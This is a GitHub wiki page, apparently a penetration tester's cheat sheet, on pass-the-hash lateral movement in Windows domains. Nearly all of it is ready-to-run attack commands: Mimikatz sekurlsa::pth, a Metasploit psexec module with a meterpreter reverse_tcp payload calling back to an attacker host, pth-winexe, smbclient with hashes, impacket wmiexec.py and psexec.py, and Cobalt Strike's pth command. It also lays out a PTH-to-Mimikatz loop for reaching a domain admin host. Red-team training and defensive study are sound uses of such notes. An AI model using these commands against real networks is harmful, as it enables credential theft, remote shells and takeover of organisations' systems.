Pass the hash - CraigDonkin/Infrastructure GitHub Wiki

Techniques for passing the hash

Overview

  • Pass the hash is a lateral movement technique
  • No need to crack the password
  • Still works but not as good as the old days
  • Obtain the equivalent privileges of the hash you compromised

Attack Paths

  • PTH with non-unique local admin hashes
    • Can be very effective across server and workstation estate
    • Not a domain account though
  • PTH > Mimikatz > PTH > Mimikatz
    • Until you on a host the DA is on etc

Mimikatz

privilege::debug
sekurlsa::pth /user:username /domain:domainname /ntlm:ntlmhash

The above command will launch cmd.exe using the hash you passed.

Metasploit

use exploit/windows/smb/psexec
set payload windows/meterpreter/reverse_tcp
set LHOST Blah
set LPORT 443
set RHOST target
set SMBPass NTLMHASH
exploit

use exploit/windows/smb/psexec_psh

pth-toolkit

https://github.com/byt3bl33d3r/pth-toolkit

pth-winexe -U username%'NTLMHASH' //host cmd.exe

smbclient

smbclient -U domain/user%NT:LM -n //host#c$

wmiexec.py

  • Part of impacket

python wmiexec.py -hashes hash user@domain

psexec

proxychains python ./psexec.py user@host -hashes hash

Cobalt Strike

  • Use the pth command
  • Needs to be run as admin
  • This uses Mimikatz

pth <domain\user> <NTLM hash>

  • Once run, you can then execute commands while impersonating the user you specified.
  • The command rev2self will revert the listener back to the original user.
⚠️ **GitHub.com Fallback** ⚠️